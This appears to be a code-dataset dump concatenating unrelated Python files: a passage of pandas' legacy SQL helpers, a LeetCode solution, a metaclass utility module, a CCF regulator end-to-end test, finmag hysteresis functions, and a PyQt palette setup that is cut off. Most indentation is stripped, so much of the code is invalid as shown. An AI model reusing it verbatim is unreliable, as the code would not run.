elif issubclass(pytype, np.datetime64) or pytype is datetime:
# Caution: np.datetime64 is also a subclass of np.number.
pytype_name = "datetime"
        elif pytype is date:
pytype_name = "date"
elif issubclass(pytype, np.bool_):
pytype_name = "bool"
return _SQL_TYPES[pytype_name][self.pd_sql.flavor]
class PandasSQLLegacy(PandasSQL):
def __init__(self, con, flavor, is_cursor=False):
self.is_cursor = is_cursor
self.con = con
if flavor is None:
flavor = 'sqlite'
if flavor not in ['sqlite', 'mysql']:
raise NotImplementedError
else:
self.flavor = flavor
def execute(self, *args, **kwargs):
if self.is_cursor:
cur = self.con
else:
cur = self.con.cursor()
try:
if kwargs:
cur.execute(*args, **kwargs)
else:
cur.execute(*args)
return cur
except Exception as e:
try:
self.con.rollback()
except Exception: # pragma: no cover
ex = DatabaseError(
"Execution failed on sql: %s\n%s\nunable to rollback" % (args[0], e))
raise_with_traceback(ex)
ex = DatabaseError("Execution failed on sql: %s" % args[0])
raise_with_traceback(ex)
def read_sql(self, sql, index_col=None, coerce_float=True, params=None,
parse_dates=None):
args = _convert_params(sql, params)
cursor = self.execute(*args)
columns = [col_desc[0] for col_desc in cursor.description]
data = self._fetchall_as_list(cursor)
cursor.close()
data_frame = DataFrame.from_records(
data, columns=columns, coerce_float=coerce_float)
_parse_date_columns(data_frame, parse_dates)
if index_col is not None:
data_frame.set_index(index_col, inplace=True)
return data_frame
def _fetchall_as_list(self, cur):
result = cur.fetchall()
if not isinstance(result, list):
result = list(result)
return result
def to_sql(self, frame, name, if_exists='fail', index=True,
index_label=None):
"""
Write records stored in a DataFrame to a SQL database.
Parameters
----------
frame: DataFrame
name: name of SQL table
flavor: {'sqlite', 'mysql'}, default 'sqlite'
if_exists: {'fail', 'replace', 'append'}, default 'fail'
fail: If table exists, do nothing.
replace: If table exists, drop it, recreate it, and insert data.
append: If table exists, insert data. Create if does not exist.
"""
table = PandasSQLTableLegacy(
name, self, frame=frame, index=index, if_exists=if_exists,
index_label=index_label)
table.insert()
def has_table(self, name):
flavor_map = {
'sqlite': ("SELECT name FROM sqlite_master "
"WHERE type='table' AND name='%s';") % name,
'mysql': "SHOW TABLES LIKE '%s'" % name}
query = flavor_map.get(self.flavor)
return len(self.execute(query).fetchall()) > 0
def get_table(self, table_name):
return None # not supported in Legacy mode
def drop_table(self, name):
drop_sql = "DROP TABLE %s" % name
self.execute(drop_sql)
def _create_sql_schema(self, frame, table_name):
table = PandasSQLTableLegacy(table_name, self, frame=frame)
return str(table.sql_schema())
def get_schema(frame, name, flavor='sqlite', keys=None, con=None):
"""
Get the SQL db table schema for the given frame.
Parameters
----------
frame : DataFrame
name : string
name of SQL table
flavor : {'sqlite', 'mysql'}, default 'sqlite'
The flavor of SQL to use. Ignored when using SQLAlchemy engine.
'mysql' is deprecated and will be removed in future versions, but it
will be further supported through SQLAlchemy engines.
keys : string or sequence
columns to use a primary key
con: an open SQL database connection object or an SQLAlchemy engine
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
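
    Examples
    --------
    A minimal sketch (not part of the original docstring):

    >>> 'CREATE TABLE' in get_schema(DataFrame({'a': [1]}), 'demo', flavor='sqlite')
    True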
"""
if con is None:
if flavor == 'mysql':
warnings.warn(_MYSQL_WARNING, FutureWarning)
return _get_schema_legacy(frame, name, flavor, keys)
pandas_sql = pandasSQL_builder(con=con, flavor=flavor)
return pandas_sql._create_sql_schema(frame, name)
def _get_schema_legacy(frame, name, flavor, keys=None):
"""Old function from 0.13.1. To keep backwards compatibility.
When mysql legacy support is dropped, it should be possible to
remove this code
"""
def get_sqltype(dtype, flavor):
pytype = dtype.type
pytype_name = "text"
if issubclass(pytype, np.floating):
pytype_name = "float"
elif issubclass(pytype, np.integer):
pytype_name = "int"
elif issubclass(pytype, np.datetime64) or pytype is datetime:
# Caution: np.datetime64 is also a subclass of np.number.
pytype_name = "datetime"
        elif pytype is date:
pytype_name = "date"
elif issubclass(pytype, np.bool_):
pytype_name = "bool"
return _SQL_TYPES[pytype_name][flavor]
lookup_type = lambda dtype: get_sqltype(dtype, flavor)
column_types = lzip(frame.dtypes.index, map(lookup_type, frame.dtypes))
if flavor == 'sqlite':
columns = ',\n '.join('[%s] %s' % x for x in column_types)
else:
columns = ',\n '.join('`%s` %s' % x for x in column_types)
keystr = ''
if keys is not None:
if isinstance(keys, string_types):
keys = (keys,)
keystr = ', PRIMARY KEY (%s)' % ','.join(keys)
template = """CREATE TABLE %(name)s (
%(columns)s
%(keystr)s
);"""
create_statement = template % {'name': name, 'columns': columns,
'keystr': keystr}
return create_statement
# legacy names, with deprecation warnings and copied docs
def read_frame(*args, **kwargs):
"""DEPRECIATED - use read_sql
"""
warnings.warn("read_frame is depreciated, use read_sql", FutureWarning)
return read_sql(*args, **kwargs)
def frame_query(*args, **kwargs):
"""DEPRECIATED - use read_sql
"""
warnings.warn("frame_query is depreciated, use read_sql", FutureWarning)
return read_sql(*args, **kwargs)
def write_frame(frame, name, con, flavor='sqlite', if_exists='fail', **kwargs):
"""DEPRECIATED - use to_sql
Write records stored in a DataFrame to a SQL database.
Parameters
----------
frame : DataFrame
name : string
con : DBAPI2 connection
flavor : {'sqlite', 'mysql'}, default 'sqlite'
The flavor of SQL to use.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
- fail: If table exists, do nothing.
- replace: If table exists, drop it, recreate it, and insert data.
- append: If table exists, insert data. Create if does not exist.
index : boolean, default False
Write DataFrame index as a column
Notes
-----
This function is deprecated in favor of ``to_sql``. There are however
two differences:
- With ``to_sql`` the index is written to the sql database by default. To
      keep the behaviour of this function you need to specify ``index=False``.
- The new ``to_sql`` function supports sqlalchemy engines to work with
different sql flavors.
See also
--------
pandas.DataFrame.to_sql
"""
warnings.warn("write_frame is depreciated, use to_sql", FutureWarning)
# for backwards compatibility, set index=False when not specified
index = kwargs.pop('index', False)
return to_sql(frame, name, con, flavor=flavor, if_exists=if_exists,
index=index, **kwargs)
# Append wrapped function docstrings
read_frame.__doc__ += read_sql.__doc__
frame_query.__doc__ += read_sql.__doc__
| 2.5 | 2 |
Dataset/Leetcode/train/58/28.py | kkcookies99/UAST | 0 | 1135 | <filename>Dataset/Leetcode/train/58/28.py
class Solution:
def XXX(self, s):
"""
:type s: str
:rtype: int
"""
cnt, tail = 0, len(s) - 1
while tail >= 0 and s[tail] == ' ':
tail -= 1
while tail >= 0 and s[tail] != ' ':
cnt += 1
tail -= 1
return cnt
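
# A quick usage sketch (not part of the original snippet):
if __name__ == "__main__":
    print(Solution().XXX("Hello World"))  # 5 -- length of the last word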
| 2.9375 | 3 |
Systerm/meta.py | ZytroCode/Systerm | 1 | 1136 | <gh_stars>1-10
"""Meta is a module contains objects that will customize the behavior of python."""
from abc import ABC
from abc import ABCMeta
from abc import abstractmethod
from typing import Any
from typing import Callable
import Systerm
# Metaclass
class Metaclass(ABCMeta):
"""A metaclass to customize the behavior of all classes."""
def __new__(self, name: str, bases: tuple[type, ...], attrs: dict[str, Any], **keys: Any) -> type:
"""The static constructor for the Metaclass.
Parameters:
name - str The name of the class
bases - tuple[type, ...] A tuple of classes to inherit
attrs - dict[str, Any] A dictionary of attributes
**keys - Any Keyword arguments to pass in
"""
# Creating a new class
cls = super().__new__(self, name, bases, dict(attrs), **keys)
cls.__setattr__ = self.setattr
# Custom magic methods
cls.__namespaces__ = {}
cls.__magics__ = {}
cls.__attributes__ = {}
cls.__publics__ = {}
cls.__privates__ = {}
cls.__protecteds__ = {}
# Setting objects
for name in dir(cls):
value = getattr(cls, name)
# Adds attributes to __magics__
if name.startswith("__") and name.endswith("__"):
cls.__magics__[name] = value
# Adds attributes to other namespace
else:
# Adds attributes to __privates__
if name.startswith("__"):
cls.__privates__[name] = value
# Adds attributes to __protecteds__
elif name.startswith("_"):
cls.__protecteds__[name] = value
# Adds attributes to __publics__
else:
cls.__publics__[name] = value
cls.__attributes__[name] = value
# Adds attributes to namespace
cls.__namespaces__[name] = value
return cls
def setattr(self, name: str, value: object) -> None:
# Adds attributes to __magics__
if name.startswith("__") and name.endswith("__"):
self.__magics__[name] = value
# Adds attributes to other namespace
else:
# Adds attributes to __privates__
if name.startswith("__"):
self.__privates__[name] = value
# Adds attributes to __protecteds__
elif name.startswith("_"):
self.__protecteds__[name] = value
# Adds attributes to __publics__
else:
self.__publics__[name] = value
self.__attributes__[name] = value
# Adds attributes to namespace
self.__namespaces__[name] = value
# Object class
class Object(object, metaclass=Metaclass):
pass
# List class
class List(list, metaclass=Metaclass):
pass
# Dictionary class
class Dictionary(dict, metaclass=Metaclass):
def __getattr__(self, name: str) -> None:
try:
return self[name]
except KeyError as e:
try:
return super().__getattr__(name)
except AttributeError:
raise e
def __setattr__(self, name: str, value: object) -> None:
self[name] = value
# Recreating ABC
ABC = Metaclass(ABC.__name__, ABC.__bases__, {name: getattr(ABC, name) for name in dir(ABC)})
def get_namespaces(object: Object) -> Dictionary:
"""Gets the namespaces of an object."""
return object.__namespaces__
def get_magics(object: Object) -> Dictionary:
"""Gets the magic methods of an object."""
return object.__magics__
def get_attributes(object: Object) -> Dictionary:
"""Gets the attributes of an object."""
return object.__attributes__
def get_publics(object: Object) -> Dictionary:
"""Gets the public namespaces of an object."""
return object.__publics__
def get_privates(object: Object) -> Dictionary:
"""Gets the private namespaces of an object."""
return object.__privates__
def get_protecteds(object: Object) -> Dictionary:
"""Gets the protected namespaces of an object."""
return object.__protecteds__
# Initializing Systerm.module
from Systerm._setup import init_module
module = init_module()
# MetaMod class
class MetaMod(module.Module):
pass
module.modules[__name__].__class__ = MetaMod
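
# A small usage sketch (not part of the original module); it assumes the Systerm package
# is importable so the imports at the top of this file succeed.
if __name__ == "__main__":
    d = Dictionary(greeting="hello")
    print(d.greeting)  # same as d["greeting"]

    class Point(Object):
        def move(self):
            pass

    print("move" in get_publics(Point))  # True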
| 3.765625 | 4 |
samples/apps/txregulator/tests/txregulatorclient.py | iqsarv/CCF | 1 | 1137 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import infra.e2e_args
import infra.ccf
import infra.jsonrpc
import logging
from time import gmtime, strftime
import csv
import random
from loguru import logger as LOG
class AppUser:
def __init__(self, network, name, country, curve):
self.name = name
self.country = country
primary, _ = network.find_primary()
network.create_users([self.name], curve)
network.consortium.add_users(primary, [self.name])
with primary.user_client(user_id=self.name) as client:
self.ccf_id = client.rpc("whoAmI", {}).result["caller_id"]
def __str__(self):
return f"{self.ccf_id} ({self.name})"
def run(args):
hosts = ["localhost"]
with infra.ccf.network(
hosts, args.build_dir, args.debug_nodes, args.perf_nodes, pdb=args.pdb
) as network:
check = infra.checker.Checker()
network.start_and_join(args)
primary, others = network.find_nodes()
script = "if tonumber(amt) > 200000 then return true else return false end"
if args.lua_script is not None:
data = []
with open(args.lua_script, "r") as f:
data = f.readlines()
script = "".join(data)
manager = AppUser(network, "manager", "GB", args.default_curve)
regulator = AppUser(network, "auditor", "GB", args.default_curve)
banks = [
AppUser(network, f"bank{country}", country, args.default_curve)
for country in ("US", "GB", "GR", "FR")
]
transactions = []
with open(args.datafile, newline="") as f:
datafile = csv.DictReader(f)
for i, row in enumerate(datafile):
                # read only the first rows (i = 0 .. 10)
if i > 10:
break
json_tx = {
"src": row["origin"],
"dst": row["destination"],
"amt": row["amount"],
"type": row["type"],
"timestamp": strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime()),
"src_country": row["src_country"],
"dst_country": row["dst_country"],
}
transactions.append(json_tx)
# Manager is granted special privileges by members, which is later read by app to enforce access restrictions
proposal_result, error = network.consortium.propose(
0,
primary,
f"""
return Calls:call(
"set_user_data",
{{
user_id = {manager.ccf_id},
user_data = {{
privileges = {{
REGISTER_REGULATORS = true,
REGISTER_BANKS = true,
}}
}}
}}
)
""",
)
network.consortium.vote_using_majority(primary, proposal_result["id"])
# Check permissions are enforced
with primary.user_client(user_id=regulator.name) as c:
check(
c.rpc("REG_register", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
check(
c.rpc("BK_register", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
with primary.user_client(user_id=banks[0].name) as c:
check(
c.rpc("REG_register", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
check(
c.rpc("BK_register", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
# As permissioned manager, register regulator and banks
with primary.node_client() as mc:
check_commit = infra.checker.Checker(mc)
with primary.user_client(format="msgpack", user_id=manager.name) as c:
check(
c.rpc(
"REG_register",
{
"regulator_id": regulator.ccf_id,
"country": regulator.country,
"script": script,
},
),
result=regulator.ccf_id,
)
check(
c.rpc("REG_get", {"id": regulator.ccf_id}),
result=[regulator.country, script],
)
check(
c.rpc(
"BK_register",
{"bank_id": regulator.ccf_id, "country": regulator.country},
),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
LOG.debug(f"User {regulator} successfully registered as regulator")
for bank in banks:
check(
c.rpc(
"BK_register",
{"bank_id": bank.ccf_id, "country": bank.country},
),
result=bank.ccf_id,
)
check(c.rpc("BK_get", {"id": bank.ccf_id}), result=bank.country)
check(
c.rpc(
"REG_register",
{"regulator_id": bank.ccf_id, "country": bank.country},
),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
LOG.debug(f"User {bank} successfully registered as bank")
LOG.success(f"{1} regulator and {len(banks)} bank(s) successfully setup")
tx_id = 0 # Tracks how many transactions have been issued
# tracks flagged/non flagged and revealed/non revealed transactions for validation
flagged_txs = {}
revealed_tx_ids = []
flagged_ids = []
non_flagged_ids = []
flagged_amt = 200000
for i, bank in enumerate(banks):
with primary.user_client(format="msgpack", user_id=bank.name) as c:
# Destination account is the next one in the list of banks
for transaction in transactions:
print(transaction)
amount = transaction["amt"]
check(c.rpc("TX_record", transaction), result=tx_id)
check(
c.rpc("TX_get", {"tx_id": tx_id}),
result={
"amt": amount,
"bank_id": bank.ccf_id,
"dst": transaction["dst"],
"dst_country": transaction["dst_country"],
"src": transaction["src"],
"src_country": transaction["src_country"],
"timestamp": transaction["timestamp"],
"type": transaction["type"],
},
)
if float(amount) > flagged_amt:
check(
c.rpc("FLAGGED_TX_get", {"tx_id": tx_id}),
result=[regulator.ccf_id, False, transaction["timestamp"]],
)
flagged_tx = {
"amt": amount,
"bank_id": bank.ccf_id,
"dst": transaction["dst"],
"dst_country": transaction["dst_country"],
"src": transaction["src"],
"src_country": transaction["src_country"],
"timestamp": transaction["timestamp"],
"tx_id": tx_id,
"type": transaction["type"],
}
flagged_ids.append(tx_id)
flagged_txs[tx_id] = flagged_tx
else:
check(
c.rpc("FLAGGED_TX_get", {"tx_id": tx_id}),
error=lambda e: e is not None
and e["code"]
== infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
non_flagged_ids.append(tx_id)
tx_id += 1
LOG.success(f"{tx_id} transactions have been successfully issued")
# bank that issued first flagged transaction
with primary.user_client(format="msgpack", user_id=bank.name) as c:
# try to poll flagged but fail as you are not a regulator
check(
c.rpc("REG_poll_flagged", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
# bank reveal some transactions that were flagged
for i, tx_id in enumerate(flagged_ids):
if i % 2 == 0:
check(c.rpc("TX_reveal", {"tx_id": tx_id}), result=True)
revealed_tx_ids.append(tx_id)
# bank try to reveal non flagged txs
for tx_id in non_flagged_ids:
check(
c.rpc("TX_reveal", {"tx_id": tx_id}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
# regulator poll for transactions that are flagged
with primary.node_client() as mc:
with primary.user_client(format="msgpack", user_id=regulator.name) as c:
# assert that the flagged txs that we poll for are correct
resp = c.rpc("REG_poll_flagged", {})
poll_flagged_ids = []
for poll_flagged in resp.result:
# poll flagged is a list [tx_id, regulator_id]
poll_flagged_ids.append(poll_flagged[0])
poll_flagged_ids.sort()
assert poll_flagged_ids == flagged_ids
for tx_id in flagged_ids:
# get from flagged txs, try to get the flagged one that was not revealed
if tx_id not in revealed_tx_ids:
check(
c.rpc("REG_get_revealed", {"tx_id": tx_id}),
error=lambda e: e is not None
and e["code"]
== infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
# get from flagged txs, try to get the flagged ones that were revealed
for tx_id in revealed_tx_ids:
check(
c.rpc("REG_get_revealed", {"tx_id": tx_id}),
result=flagged_txs[tx_id],
)
if __name__ == "__main__":
def add(parser):
parser.add_argument(
"--lua-script", help="Regulator checker loaded as lua script file", type=str
)
parser.add_argument(
"--datafile", help="Load an existing scenario file (csv)", type=str
)
args = infra.e2e_args.cli_args(add)
args.package = args.app_script and "libluageneric" or "liblogging"
run(args)
| 2.046875 | 2 |
src/finmag/sim/hysteresis.py | davidcortesortuno/finmag | 10 | 1138 | <reponame>davidcortesortuno/finmag
import os
import re
import glob
import logging
import textwrap
import fileinput
import numpy as np
from finmag.energies import Zeeman
from finmag.util.helpers import norm
log = logging.getLogger(name="finmag")
def hysteresis(sim, H_ext_list, fun=None, **kwargs):
"""
Set the applied field to the first value in `H_ext_list` (which should
be a list of external field vectors) and then call the relax() method.
When convergence is reached, the field is changed to the next one in
H_ext_list, and so on until all values in H_ext_list are exhausted.
Note: The fields in H_ext_list are applied *in addition to* any Zeeman
interactions that are already present in the simulation.
In particular, if only one external field should be present then
do not add any Zeeman interactions before calling this method.
If you would like to perform a certain action (e.g. save a VTK
snapshot of the magnetisation) at the end of each relaxation stage,
use the sim.schedule() command with the directive 'at_end=True' as
in the following example:
sim.schedule('save_vtk', at_end=True, ...)
sim.hysteresis(...)
*Arguments*
H_ext_list: list of 3-vectors
List of external fields, where each field can have any of
the forms accepted by Zeeman.__init__() (see its docstring
for more details).
fun: callable
The user can pass a function here (which should accept the
Simulation object as its only argument); this function is
called after each relaxation and determines the return
value (see below). For example, if
fun = (lambda sim: sim.m_average[0])
then the return value is a list of values representing the
average x-component of the magnetisation at the end of
each relaxation.
All other keyword arguments are passed on to the relax() method.
See its documentation for details.
*Return value*
If `fun` is not None then the return value is a list containing an
accumulation of all the return values of `fun` after each stage.
Otherwise the return value is None.
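    *Example*
    (Sketch for illustration only; assumes `sim` is a fully configured
    Simulation object and numpy is imported as np, as in this module.)
        fields = [np.array([0, 0, H]) for H in (1e5, 0.0, -1e5)]
        mz_vals = hysteresis(sim, fields, fun=lambda s: s.m_average[2])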
"""
if H_ext_list == []:
return
# Add a new Zeeman interaction, initialised to zero.
H = Zeeman((0, 0, 0))
sim.add(H)
# We keep track of the current stage of the hysteresis loop.
cur_stage = 0
num_stages = len(H_ext_list)
res = []
try:
while True:
H_cur = H_ext_list[cur_stage]
log.info(
"Entering hysteresis stage #{} ({} out of {}). Current field: "
"{}".format(cur_stage, cur_stage + 1, num_stages, H_cur))
H.set_value(H_cur)
sim.relax(**kwargs)
cur_stage += 1
if fun is not None:
retval = fun(sim)
res.append(retval)
log.debug("hysteresis callback function '{}' returned "
"value: {}".format(fun.__name__, retval))
except IndexError:
log.info("Hysteresis is finished.")
log.info("Removing the applied field used for hysteresis.")
sim.remove_interaction(H.name)
return res or None
def hysteresis_loop(sim, H_max, direction, N, **kwargs):
"""
Compute a hysteresis loop. This is a specialised convenience
version of the more general `hysteresis` method. It computes a
hysteresis loop where the external field is applied along a
single axis and changes magnitude from +H_max to -H_max and
back (using N steps in each direction).
The return value is a pair (H_vals, m_vals), where H_vals is
the list of field strengths at which a relaxation is performed
and m_vals is a list of scalar values containing, for each
field value, the averaged value of the magnetisation along the
axis `direction` (after relaxation has been reached). Thus the
command plot(H_vals, m_vals) could be used to plot the
hysteresis loop.
direction -- a vector indicating the direction of the
external field (will be normalised
automatically)
H_max -- maximum field strength
N -- number of data points to compute in each direction
(thus the total number of data points for the entire
loop will be 2*N-1)
kwargs -- any keyword argument accepted by the hysteresis() method
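    Example (sketch for illustration only; assumes `sim` is a configured
    Simulation object):
        H_vals, m_vals = hysteresis_loop(sim, H_max=1e5,
                                         direction=[1, 0, 0], N=21)
        # plot(H_vals, m_vals) then traces the loop along the x axis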
"""
d = np.array(direction)
H_dir = d / norm(d)
H_norms = list(np.linspace(H_max, -H_max, N)) + \
list(np.linspace(-H_max, H_max, N))
H_vals = [h * H_dir for h in H_norms]
m_avg = hysteresis(sim, H_vals, fun=lambda sim: sim.m_average, **kwargs)
# projected lengths of the averaged magnetisation values along the axis
# `H_dir`
m_vals = [np.dot(m, H_dir) for m in m_avg]
return (H_norms, m_vals)
| 2.6875 | 3 |
uiSetup.py | smokedpirate/Encryption-hash-generator | 4 | 1139 | <reponame>smokedpirate/Encryption-hash-generator<gh_stars>1-10
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5 import QtGui, QtCore
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(577, 341)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
MainWindow.setPalette(palette)
MainWindow.setAutoFillBackground(False)
MainWindow.setStyleSheet("background-color: rgb(84, 84, 84);")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.Algorithms = QtWidgets.QComboBox(self.centralwidget)
self.Algorithms.setGeometry(QtCore.QRect(190, 60, 191, 41))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
